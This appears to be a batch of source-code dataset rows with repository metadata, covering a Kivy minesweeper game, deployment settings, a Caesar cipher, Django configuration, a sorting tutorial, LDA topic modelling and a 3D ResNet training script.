7323b2c18d384da31b9dfd21065b9cdad6f87a6d | 38b720fe7a6d42a16703cdf262b4898c2cc43a7b | /main.py | 105de1e70caf6d9fdddf22959cdf2c46a188ac16 | [
"CC-BY-4.0",
"MIT"
] | permissive | learnleapfly/minesweeper | aa2492b9f560593d49e887753e7f2475df390b19 | a9a951137da68a37ac4db2129ce4679f741d8fea | refs/heads/master | 2021-01-20T22:34:21.408485 | 2016-06-03T05:39:43 | 2016-06-03T05:39:43 | 60,320,836 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,265 | py | from kivy.app import App
from kivy.uix.label import Label
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.gridlayout import GridLayout
from kivy.properties import NumericProperty, ObjectProperty, StringProperty
from kivy.clock import Clock
from kivy.core.window import Window
from kivy.logger import Logger
from random import choice
from itertools import product
from kivy.animation import Animation
###########################################################################
TOUCH_HOLD_THRESHOLD = 0.5
GAME_SIZE = 4
NUMBER_OF_BOMBS = 2
class GridSquare(Label):
square_label = StringProperty('Z')
def __init__(self, **kwargs):
super(GridSquare, self).__init__(**kwargs)
self.is_bomb = False
self.guess_bomb = False
self.is_hidden = True
self.square_label = '.'
self.bombs_nearby = 0
self.coords = None
def set_label(self):
if self.guess_bomb:
self.square_label = 'Bomb?'
elif self.is_hidden:
self.square_label = '.'
elif self.is_bomb:
self.square_label = 'BOOM'
self.parent.parent.mainwindow.end_game('You Lose!')
elif self.bombs_nearby > 0:
self.square_label = str(self.bombs_nearby)
else:
self.square_label = ' '
def reveal_square(self):
if self.is_hidden:
self.is_hidden = False
self.set_label()
if self.is_bomb is False and self.bombs_nearby == 0:
for neighbour in self.parent.get_neighbours(self.coords):
neighbour.reveal_square()
if self.parent.parent is not None:
self.parent.parent.mainwindow.check_for_win()
def on_touch_up(self, touch):
if self.collide_point(*touch.pos):
if Clock.get_time() - touch.time_start > TOUCH_HOLD_THRESHOLD:
self.toggle_guess_bomb()
else:
self.reveal_square()
return True
def toggle_guess_bomb(self):
self.guess_bomb = not self.guess_bomb
self.set_label()
if self.guess_bomb:
self.parent.parent.mainwindow.num_bombs_left -= 1
else:
self.parent.parent.mainwindow.num_bombs_left += 1
class GameBoard(GridLayout):
mainwindow = ObjectProperty(None)
def __init__(self, **kwargs):
super(GameBoard, self).__init__(**kwargs)
self.board_size = GAME_SIZE
self.cols = GAME_SIZE
self.grid_squares = {}
for coords in product(xrange(0, self.board_size), xrange(0, self.board_size)):
new_square = GridSquare()
new_square.coords = coords
self.grid_squares[coords] = new_square
self.add_widget(new_square)
self.scatter_bombs(NUMBER_OF_BOMBS)
self.compute_all_bomb_counts()
def get_neighbours(self, (row, col)):
for coord in product(range(row-1, row+2), range(col-1, col+2)):
if coord in self.grid_squares.keys() and coord != (row, col):
yield self.grid_squares[coord]
def scatter_bombs(self, num_bombs):
for _ in xrange(0, num_bombs):
coords = choice([(x, y) for x in range(0, self.board_size) for y in range(0, self.board_size)])
self.grid_squares[coords].is_bomb = True
def compute_all_bomb_counts(self):
for coord in product(xrange(0, self.board_size), xrange(0, self.board_size)):
grid_square = self.grid_squares[coord]
grid_square.bombs_nearby = self.compute_bomb_count(coord)
def compute_bomb_count(self, target):
bomb_count = 0
for neighbour in self.get_neighbours(target):
if neighbour.is_bomb:
bomb_count += 1
return bomb_count
class MinesweeperGame(BoxLayout):
num_bombs_left = NumericProperty(None)
timer = NumericProperty(None)
best_time = NumericProperty(None)
winner_status = StringProperty('Unknown')
def __init__(self, **kwargs):
super(MinesweeperGame, self).__init__(**kwargs)
self._keyboard = Window.request_keyboard(self.close, self)
self._keyboard.bind(on_key_down=self.press)
self.num_bombs_left = NUMBER_OF_BOMBS
self.timer = 999
self.start_time = Clock.get_time()
self.best_time = 9999
self.board = GameBoard()
self.playing_area.add_widget(self.board)
Clock.schedule_interval(self.timer_callback, 1.0)
def timer_callback(self, _):
self.timer = int(Clock.get_time() - self.start_time)
def close(self):
self._keyboard.unbind(on_key_down=self.press)
self._keyboard = None
App.get_running_app().stop()
def reset_game(self, instance=None, value=None):
Logger.info("reset: game")
if self.board:
self.playing_area.remove_widget(self.board)
self.board = GameBoard()
self.playing_area.add_widget(self.board)
self.start_time = Clock.get_time()
def press(self, keyboard, keycode, text, modifiers):
if keycode[1] == 'escape':
self.close()
elif keycode[1] == 'r':
self.reset_game()
else:
Logger.info("Unknown key: {}".format(keycode))
return True
def check_for_win(self):
for gs in self.board.grid_squares.values():
if gs.is_hidden and gs.is_bomb is False:
return False
self.end_game('You Win!')
def end_game(self, status):
self.winner_status = status
if 'win' in status.lower() and self.timer < self.best_time:
self.best_time = self.timer
label = Label(text=status)
animation = Animation(font_size=72, d=2)
animation += Animation(font_size=0, d=1)
self.playing_area.add_widget(label)
animation.bind(on_complete=self.reset_game)
animation.start(label)
###########################################################################
###########################################################################
class MinesweeperApp(App):
def build(self):
game = MinesweeperGame()
game.reset_game()
return game
if __name__ == '__main__':
MinesweeperApp().run()
| [
"sastels@gmail.com"
] | sastels@gmail.com |
32cb38a310c700108f11efe46c3216dddabc43fd | 0649e55322c5efa514294754151cedda66ea28be | /build-template/cotton_settings.py | 0598181e80025bf2d14645be1e71bedbd9ebb1e2 | [
"MIT"
] | permissive | evilchili/cotton | c803eabe9fb27dd45b3a545c4f0407c7f6303427 | 92d72a372e2afed91b6c5928ba096ed1d74f5c9a | refs/heads/master | 2021-01-13T02:08:54.495162 | 2015-02-13T16:06:10 | 2015-02-13T16:06:10 | 30,030,865 | 1 | 2 | null | 2015-02-03T23:29:16 | 2015-01-29T16:59:01 | Python | UTF-8 | Python | false | false | 2,844 | py | # cotton_settings.py
# -- Tell cotton how to deploy your application
#
# Import the default settings directly into the current namespace, so that you can combine,
# extend, and override the defaults with settings unique to your application deployment.
from cotton.settings import *
import os
# Name your project here. Will be used as a directory name, so be sensible.
PROJECT_NAME = ''
# deploy the appplication to /usr/local/deploy/sprobot/, creating
# bin/, lib/, project/ and so on at that location.
VIRTUALENV_PATH = os.path.join(VIRTUALENV_HOME, PROJECT_NAME)
# Where the application code (ie, the contents of the current directory) will be deployed.
PROJECT_ROOT = os.path.join(VIRTUALENV_PATH, 'project')
# A list of target nodes which cotton should (optionally) bootstrap and deploy your app to
HOSTS = []
# A list of IPv4 addresses that should be granted administrative access. This includes
# permitting SSH access, and may be leveraged for additional purposes in your ap
ADMIN_IPS = []
# The system user and group that should execute your application. The user will be created
# by cotton automatically, if it doesn't already exist. Existing users should not have extra
# privileges, including sudo access.
PROJECT_USER = ''
PROJECT_GROUP = ''
# PIP_REQUIREMENTS_PATH is defined by cotton's default settings, and includes cotton's very small
# list of required python packages (ie, virtualenv). You can override this or extend it with the
# path to your own requirements.txt, relative to your application's root.
#
#PIP_REQUIREMENTS_PATH += ['build/requirements/pip.txt']
# If True, do not prompt for confirmation of dangerous actions. Required for unattended operation,
# but dangerous in mixed (ie, dev/testing) environments, so disabled by default.
#
# NO_PROMPTS = False
# The timezone the HOSTS should be in. Cotton defaults to UTC; you can override that here.
#TIMEZONE = "America/New_York"
# By default cotton assumes your application is in a git repository, and that git can be used
# to deploy the application source to the HOSTS.
#
#USE_GIT = True
# If you want your HOSTS to run an SMTP server for outbound mail, set SMTP_HOST=True. You can
# specify a relay host with SMTP_RELAY.
#SMTP_HOST = False
#SMTP_RELAY = None
# Cotton includes a minimal set of templates for configuration files that can be managed by cotton.
# You can extend the templates by adding template files, using standard python string.format()
# syntax, to your /build/templates folder, and define their use below.
#
# Here is an example for a hypothetical crontab used to execute scheduled tasks for your app:
#
# TEMPLATES += [
# {
# "name": "cron",
# "local_path": "templates/crontab",
# "remote_path": "/etc/cron.d/%(project_name)s",
# "owner": "root",
# "mode": "600",
# }
# ]
#TEMPLATES += []
| [
"greg@automagick.us"
] | greg@automagick.us |
20691830fbf91a5caae39677d6ec0024590b522a | 72b00923d4aa11891f4a3038324c8952572cc4b2 | /python/datastruct/dd_oob/pgm07_28.txt | c1f7f8084c1a8e16b2bdb107bdc35ca04776988a | [] | no_license | taowuwen/codec | 3698110a09a770407e8fb631e21d86ba5a885cd5 | d92933b07f21dae950160a91bb361fa187e26cd2 | refs/heads/master | 2022-03-17T07:43:55.574505 | 2022-03-10T05:20:44 | 2022-03-10T05:20:44 | 87,379,261 | 0 | 0 | null | 2019-03-25T15:40:27 | 2017-04-06T02:50:54 | C | UTF-8 | Python | false | false | 722 | txt | #
# This file contains the Python code from Program 7.28 of
# "Data Structures and Algorithms
# with Object-Oriented Design Patterns in Python"
# by Bruno R. Preiss.
#
# Copyright (c) 2003 by Bruno R. Preiss, P.Eng. All rights reserved.
#
# http://www.brpreiss.com/books/opus7/programs/pgm07_28.txt
#
class SortedListAsArray(OrderedListAsArray, SortedList):
def withdraw(self, obj):
if self._count == 0:
raise ContainerEmpty
offset = self.findOffset(obj)
if offset < 0:
raise KeyError
i = offset
while i < self._count:
self._array[i] = self._array[i + 1]
i += 1
self._array[i] = None
self._count -= 1
# ...
| [
"taowuwen@126.com"
] | taowuwen@126.com |
8dcec558df4f4a3598ab780b750a6e0064bd8ade | cf5bc71196814c875fe7f63d441d6ca016155737 | /caesar-cipher.py | 33a227678064870e30fae361b1860d0ad6c915f2 | [] | no_license | pkrrs/caeser_cipher | 2aa15426531ce7dd5c23a61620d2a6b37b9b19da | 20ad1835fab7325156be0b430969c063db061dd7 | refs/heads/main | 2023-06-22T21:37:25.377007 | 2021-07-06T19:07:07 | 2021-07-06T19:07:07 | 383,572,790 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,057 | py | alphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'a', 'b', 'c',
'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's',
't', 'u', 'v', 'w', 'x', 'y', 'z']
logo = """
,adPPYba, ,adPPYYba, ,adPPYba, ,adPPYba, ,adPPYYba, 8b,dPPYba,
a8" "" "" `Y8 a8P_____88 I8[ "" "" `Y8 88P' "Y8
8b ,adPPPPP88 8PP""""""" `"Y8ba, ,adPPPPP88 88
"8a, ,aa 88, ,88 "8b, ,aa aa ]8I 88, ,88 88
`"Ybbd8"' `"8bbdP"Y8 `"Ybbd8"' `"YbbdP"' `"8bbdP"Y8 88
88 88
"" 88
88
,adPPYba, 88 8b,dPPYba, 88,dPPYba, ,adPPYba, 8b,dPPYba,
a8" "" 88 88P' "8a 88P' "8a a8P_____88 88P' "Y8
8b 88 88 d8 88 88 8PP""""""" 88
"8a, ,aa 88 88b, ,a8" 88 88 "8b, ,aa 88
`"Ybbd8"' 88 88`YbbdP"' 88 88 `"Ybbd8"' 88
88
88
"""
print(logo)
def caesar(direction,text,shift):
text_in_list = list(text)
word = []
if direction == "decode":
shift *= -1
for letter in text_in_list:
if letter.isalpha():
word.append(alphabet[alphabet.index(letter) + shift])
else:
word.append(letter)
print(f"The {direction}d text is {''.join(word)}")
should_continue = True
while should_continue:
direction = input("Type 'encode' to encrypt, type 'decode' to decrypt:\n")
text = input("Type your message:\n").lower()
shift = int(input("Type the shift number:\n"))
shift = shift % 26
caesar(direction, text, shift)
control= input("Do you wish to Continue. Type 'yes' or 'no'. ")
if control == "no":
should_continue = False
print("GoodBye!")
| [
"noreply@github.com"
] | pkrrs.noreply@github.com |
69431a884b8cbce9273d4e7c5a8c5fa2e91d8e23 | 88bae1c9e754704daaab7d2dc2d331588bf0198f | /stringSpacePL.py | ded3921f8716ae01148f47cf99fe71fb24f895b1 | [] | no_license | AdamBialachowski/DODziennyBonus | b494227b5d72ff2c02d9c761e605d5b6ba7e9008 | 50a54d706db043780a6b25a7d76d6b10cbd52dd5 | refs/heads/master | 2022-11-06T10:36:36.843255 | 2020-06-16T14:19:21 | 2020-06-16T14:19:21 | 271,051,279 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 147 | py | dailyBonus = "Dzienny bonus"
howManyAccount = "Podaj ile kont chcesz zalogować"
next = "Dalej"
add = "Dodaj"
login = "Login:"
password = "Hasło:" | [
"pitoab@wp.pl"
] | pitoab@wp.pl |
16e518af1ef8faffdd952926725af111f5dc1064 | 35dbe24cd5bd9abc5e5f2963affbb53ab47af9c7 | /self_parameter.py | cb0164a403517af8e796944d0bdc53bc65c3cad5 | [] | no_license | geethayedida/codeacademy_python | 4f4baf67c179fa423c86242ceb37a0494e458ec3 | 1705af3ffa4b0e767d5b4db98a515aeb5b814da8 | refs/heads/master | 2021-01-10T11:14:36.134173 | 2016-02-05T16:35:16 | 2016-02-05T16:35:16 | 51,018,834 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 169 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Feb 03 19:38:52 2016
@author: Geetha Yedida
"""
class Animal(object):
def __init__(self, name):
self.name = name | [
"yedida.geetha@gmail.com"
] | yedida.geetha@gmail.com |
c4811b51bbacc8bb1c631898f0908eeb72d312dc | 6cdbc1f314d12ed5bff21cd6ca5b2e7b71f09c91 | /lists/migrations/0004_item_list.py | 731a08eb05a32c707ff665942814a314ab9e053b | [] | no_license | nanjsun/TDD-Django | 11940a715f5f312ff2c297e146cbaa65f95ba151 | 1c80127339efd3587977e9193adee01fc04f03fa | refs/heads/master | 2021-01-19T10:00:33.128559 | 2017-04-07T00:16:43 | 2017-04-07T00:16:43 | 87,811,605 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 524 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2016-12-01 21:13
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('lists', '0003_list'),
]
operations = [
migrations.AddField(
model_name='item',
name='list',
field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, to='lists.List'),
),
]
| [
"279956327@qq.com"
] | 279956327@qq.com |
2ceb33c6d79c386bdc5e5ec6a9245488beada078 | 9ef59114b6be16df404a1041ecc7f5f885f4ee1d | /qqbot.py | 86b91d8c1721f9656e3e82873bd54a63703b791a | [
"Apache-2.0"
] | permissive | limu520/qqbot_checkbot | 7ff0dace0ac6f90a6f44aed53bdd7490638738d1 | 205e077dcd0e6096f26056e7936da11ae93786d4 | refs/heads/main | 2023-07-09T12:58:09.251477 | 2021-08-06T05:59:37 | 2021-08-06T05:59:37 | 393,256,601 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,777 | py | from flask import *
import requests
import sqlite3
import random
import json
##配置文件
api_url1 = 'http://127.0.0.1:5700/send_msg'
api_url2 = "http://127.0.0.1:5700/delete_msg"
qq_group=["723174283"]
##初始化
for a in qq_group:
db = sqlite3.connect("qq.db")
cur=db.cursor()
cur.execute("CREATE TABLE IF NOT EXISTS qq"+a+"(qq_id TEXT,confirm TEXT)")
db.commit()
cur.close()
db.close()
##数据库增加
def inc(db_name = "", qq_id = "",con_id = ""):
db = sqlite3.connect("qq.db")
cur=db.cursor()
cur.execute("INSERT INTO qq"+db_name+" values(?,?)",(str(qq_id),str(con_id)))
db.commit()
cur.close()
db.close()
return ''
##数据库删除
def delqq(db_name = "", qq_id = ""):
db = sqlite3.connect("qq.db")
cur=db.cursor()
n=cur.execute("DELETE FROM qq"+db_name+" WHERE qq_id="+qq_id+"")
db.commit()
cur.close()
db.close()
return ''
##数据库查询
def check(db_name = "", qq_id = ""):
db = sqlite3.connect("qq.db")
cur=db.cursor()
cur.execute("SELECT * FROM qq"+db_name+" where qq_id="+qq_id+"")
result = cur.fetchone()
cur.close()
db.close()
return result
##撤回
def del_msg(msg_id = 0):
msg = {
"message_id":msg_id
}
msg_re = requests.post(api_url2,data=msg)
print(msg_re)
return ''
##群消息发送
def group_msg(group_id = 0 , message = ""):
msg = {
'group_id':group_id,
'message':message,
'auto_escape':False
}
msg_re = requests.post(api_url1,data=msg)
print(msg_re)
return ''
##主程序
bot_server = Flask(__name__)
@bot_server.route('/',methods=['POST'])
def server():
data = request.get_data().decode('utf-8')
data = json.loads(data)
print(data)
##进群消息
if data["post_type"] == "notice" and data["notice_type"] == "group_increase":
con_id = random.sample('zyxwvutsrqponmlkjihgfedcba',8)
inc(str(data["group_id"]),str(data["user_id"]),str(con_id))
group_msg(data["group_id"],"请在群内发送以下字符串\n"+str(con_id)+"\n然后您将可以在本群发言")
if data["post_type"] == "message":
if str(data["group_id"]) in qq_group:
result = check(str(data["group_id"]),str(data["user_id"]))
if result:
if result[1] in data["message"]:
group_msg(data["group_id"],"恭喜您通过验证!!!")
delqq(str(data["group_id"]), str(data["user_id"]))
else:
del_msg(data["message_id"])
group_msg(data["group_id"],"请完成验证")
return ''
if __name__ == '__main__':
bot_server.run(host="127.0.0.1",port=5701,debug=True)
| [
"noreply@github.com"
] | limu520.noreply@github.com |
89526b724a8f8978c3bf6a388199944ae3c8c518 | 94a418db07710410479a1b54d7ddca163ec5b5a1 | /7-25/高阶函数之sorted函数.py | f15b2c90d28c4505070c577818da8feb40dd5407 | [] | no_license | 1131057908/yuke | 2e09736575ae3ed9cc86141f3a24e3055577d7ea | 7985ead3b8ab0eb9d503bcb85112364a36bff800 | refs/heads/master | 2020-03-24T17:54:06.320658 | 2018-07-30T13:01:02 | 2018-07-30T13:01:02 | 142,875,808 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,096 | py | """
座右铭:将来的你一定会感激现在拼命的自己
@project:7-25
@author:Mr.Zhang
@file:高阶函数之sorted函数.PY
@ide:PyCharm
@time:2018-07-25 10:51:28
"""
#sorted():用于对个序列进行升序排列。第一个参数:序列,第二个参数key:用于指定一个只接收一个参数的函数,这个函数用于从序列中的每个元素中提取一个用于排序的关键字,默认值为None。第三个参数reverse:有两个值,一个为True,一个为False。如果reverse=True,则列表中的元素会被倒序排列。
#sorted默认按照ASCLL排序
from functools import cmp_to_key
#
# list1=[30,50,70,3,9]
# list2=sorted(list1)
# print('排列之后的结果',list2)
#5,3,2,4,1
#1,2,3,4,5
#5,4,3,2,1
#a:97,b:98,c:99,d,100
# list4=['b','c','a','d']
# list3=sorted(list4,reverse=True)
# print(list4)
# print('倒序排列:',list3)
# #
# list5=[('b',4),('a',0),('c',2),('d',3)]
# list6=sorted(list5,key=lambda x:x[0])
# print('=====',list6)
# #如果使用sorted()函数实现对一个序列的降序排序。
list7=[20,15,70,3,9]
# list8=sorted(list7)
# print('升序排列:',list8)
# #
# #如果x>y返回-1,x<y返回1,是按照降序排列的
# #如果x>y返回1,x<y返回-1,则就是默认的升序排列
def revsersed(x,y):
if x>y:
return -1
if x<y:
return 1
return 0
result=sorted(list7,key=cmp_to_key(revsersed))
print('降序排列:',result)
#
# #面试中的常考题:sort和sorted的区别
# #sort排序会改变原来的list,而sorted排序只是对原有列表进行排序返回了一个新的经过排序之后的列表,并不会对原有列表进行改动。
# #sorted用于对一个序列进行排序。而sort只能用于列表的排序。
# #sort只是单纯的对列表进行内部排序,并没有返回值。
#
# print('*****************')
# list9=[9,5,3,8,7,1]
# print(list9)
# list9.sort()
# print(list9)
#
#
# print('****************')
# list10=[11,15,9,7,6]
# print(list10)
# print(sorted(list10))
# print(list10)
#
# test=(1,2,5,9,8)
# # test.sort()
# print(sorted(test))
#
#
#
| [
"1131057908@qq.com"
] | 1131057908@qq.com |
7fc7aff791a09b99186fbd863e81e975b037f8bf | af8c6011942e920703372c34b47254e4da423c55 | /aortaPy/lung-cancer-detector-master/resnet3d_101/trainval.py | ea62720b8a4861a570b8844600febbb063d13dc8 | [] | no_license | gfkd-xyu/xyu-code | 8aa1e4173a3086446d050ec2b125e4c79fd67dc6 | f4b067f236951ed43e7f801883bd1fcecb858f22 | refs/heads/master | 2021-07-07T02:32:39.153352 | 2020-07-27T07:01:19 | 2020-07-27T07:01:19 | 132,722,905 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,064 | py | """Train script
"""
from __future__ import (absolute_import, division,
print_function, unicode_literals)
import datetime
import requests
import argparse
import numpy as np
from keras.callbacks import (
ReduceLROnPlateau,
CSVLogger,
EarlyStopping,
ModelCheckpoint)
from keras.optimizers import Adam
from preprocessing.volume_image import (
VolumeImageDataGenerator)
from preprocessing.image_loader import (
NPYDataLoader)
from models.resnet3d import Resnet3DBuilder
import yaml
with open("init_args.yml", 'r') as stream:
try:
init_args = yaml.load(stream)
except yaml.YAMLError as exc:
print(exc)
# generate a random training title
r = requests.get('https://frightanic.com/goodies_content/docker-names.php')
if r.raise_for_status():
raise
title = r.text.rstrip()
# parset a training title
parser = argparse.ArgumentParser(description='Continue a training.')
parser.add_argument('-t', help='The title of the training to continue')
args = parser.parse_args()
if args.t:
title = args.t
nb_classes = init_args['volume_image_data_generator']['train'][
'flow_from_loader']['nb_classes']
checkpointer = ModelCheckpoint(
filepath="output/resnet101_checkpoint_{}.h5".format(title),
verbose=1,
save_best_only=True)
lr_reducer = ReduceLROnPlateau(monitor='val_loss',
factor=np.sqrt(0.1),
cooldown=0,
patience=10, min_lr=1e-6)
early_stopper = EarlyStopping(monitor='val_loss',
min_delta=0.001,
patience=100)
csv_logger = CSVLogger(
'output/{}_{}.csv'.format(datetime.datetime.now().isoformat(), title))
train_datagen = VolumeImageDataGenerator(
**init_args['volume_image_data_generator']['train']['init'])
val_datagen = VolumeImageDataGenerator(
**init_args['volume_image_data_generator']['val']['init'])
train_vol_loader = NPYDataLoader(
**init_args['volume_image_data_loader']['train'])
val_vol_loader = NPYDataLoader(
**init_args['volume_image_data_loader']['val'])
train_iter_args = init_args['volume_image_data_generator']['train']['flow_from_loader']
train_iter_args['volume_image_data_loader'] = train_vol_loader
val_iter_args = init_args['volume_image_data_generator']['val']['flow_from_loader']
val_iter_args['volume_image_data_loader'] = val_vol_loader
image_shape = train_datagen.image_shape
model = Resnet3DBuilder.build_resnet_101(image_shape, nb_classes)
compile_args = init_args['model']['compile']
compile_args['optimizer'] = Adam(lr=1e-3)
model.compile(**compile_args)
model_fit_args = init_args['model']['fit_generator']
model_fit_args['generator'] = train_datagen.flow_from_loader(**train_iter_args)
model_fit_args['validation_data'] = val_datagen.flow_from_loader(
**val_iter_args)
model_fit_args['callbacks'] = [checkpointer, lr_reducer, early_stopper, csv_logger]
model.fit_generator(**model_fit_args)
model.save('output/resnet101_{}.h5'.format(title))
| [
"gfkd_yx@pku.edu.cn"
] | gfkd_yx@pku.edu.cn |
58f6541c17f821441c527340ba01b4d5c1e80583 | 51fa621d5b095ab41a338b4191e201f878a9e8db | /ss_project/settings.py | 5d1cec52a680cc264c16695897815c8deacb14e3 | [] | no_license | woshiwzy/ss_project | 5da6430530e5d3d1de524df0bf594161d31d9996 | fb7b92975f307ceaa1ba100db8fa060f53184bcc | refs/heads/master | 2020-03-19T06:41:34.891137 | 2018-07-09T14:10:18 | 2018-07-09T14:10:18 | 136,046,232 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,157 | py | """
Django settings for ss_project project.
Generated by 'django-admin startproject' using Django 1.11.13.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'ua5g*asvb20%n+nggr84=3da#&fl39d+hqdr4zmf#uk4qg96tc'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
"app_ss"
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'ss_project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'ss_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
AUTH_USER_MODEL = 'app_ss.User'
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
| [
"wzyfly@sina.com"
] | wzyfly@sina.com |
17aa41a4d34392c255c77bf534f4c854c422ba37 | 3375aa017a4db589614459e595565b6bb8f6ec41 | /modelLDA.py | c44087fc9a5aab25844e928517bb7432d80effc2 | [] | no_license | zmddzf/wandering_earth | bd1f8135852f2f1a72d2297a43a2935ed07d4246 | 1a1e29ac067b695e0fcb3b57b254825d9ee5a93d | refs/heads/master | 2020-04-22T00:10:49.144386 | 2019-02-10T11:18:47 | 2019-02-10T11:18:47 | 169,970,208 | 12 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,546 | py | # -*- coding: utf-8 -*-
"""
Created on Sat Feb 9 22:04:51 2019
@author: zmddzf
"""
import pandas as pd
from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer
from sklearn.decomposition import LatentDirichletAllocation
import jieba
import pyLDAvis
import pyLDAvis.sklearn
# 读取评论数据
hComments = []
with open('hComments.txt', 'r', encoding="utf-8") as f1:
for line in f1:
hComments.append(" ".join(jieba.cut(line)))
mComments = []
with open('mComments.txt', 'r', encoding="utf-8") as f2:
for line in f2:
mComments.append(" ".join(jieba.cut(line)))
lComments = []
with open('lComments.txt', 'r', encoding="utf-8") as f3:
for line in f3:
lComments.append(" ".join(jieba.cut(line)))
# 合并评论数据
comments = hComments + mComments + lComments
df = pd.DataFrame(comments)
# 关键词提取和向量转化
tfVectorizer = CountVectorizer(strip_accents = 'unicode',
max_features = 1000,
max_df = 0.5,
min_df = 10
)
tf = tfVectorizer.fit_transform(df[0])
# 初始化lda
lda = LatentDirichletAllocation(n_topics = 3,
max_iter =50,
learning_method = 'online',
learning_offset = 50,
random_state = 0)
lda.fit(tf) # 训练
# 可视化lda
data = pyLDAvis.sklearn.prepare(lda, tf, tfVectorizer)
pyLDAvis.show(data) | [
"35198228+zmddzf@users.noreply.github.com"
] | 35198228+zmddzf@users.noreply.github.com |
2a0f864a90d2c9af31adaade203406309f66c9d1 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_333/ch77_2020_04_13_15_29_15_904054.py | a10778292bfbe71d82aaf9be4a6d5a915023fc82 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 348 | py | import math
def calcula_tempo(dicionario):
nome_tempo={}
for nome_e_aceleracao in dicionario:
nome=nome_e_aceleracao[0]
aceleracao=nome_e_aceleracao[1]
tempo=aceleracao_tempo(int(aceleracao))
nome_tempo[nome]=tempo
return nome_tempo
def aceleracao_tempo(a):
t=math.sqrt(200/a)
return t
| [
"you@example.com"
] | you@example.com |
ae21355a947fa26186d70f23b068505b5b7e2275 | bf28104fcddede4caea403cc256a0bf695e953bd | /StreamLine/mainImports.py | 36a2412320e222659b018182a6081683902085ee | [] | no_license | edixon1/StreamLine | 76b4f4c0942faa75a70264b5e812993d9407d973 | 3e70a7cd1419e6f46cace5461f19a20b163a4fe6 | refs/heads/master | 2020-04-10T07:15:40.602406 | 2018-12-07T21:20:12 | 2018-12-07T21:20:12 | 160,876,417 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 599 | py | # -*- coding: utf-8 -*-
from kivy.app import App
from kivy.uix.boxlayout import BoxLayout
from kivy.properties import ObjectProperty
from kivy.uix.screenmanager import ScreenManager, Screen, FadeTransition
from kivy.lang import Builder
from kivy.uix.textinput import TextInput
from kivy.uix.listview import ListItemButton
import sqlite3
import os
from plyer import gps
from kivy.clock import Clock, mainthread
from kivy.uix.popup import Popup
from kivy.uix.label import Label
import gspread
import sqlite3
import os
from oauth2client.service_account import ServiceAccountCredentials | [
"noreply@github.com"
] | edixon1.noreply@github.com |
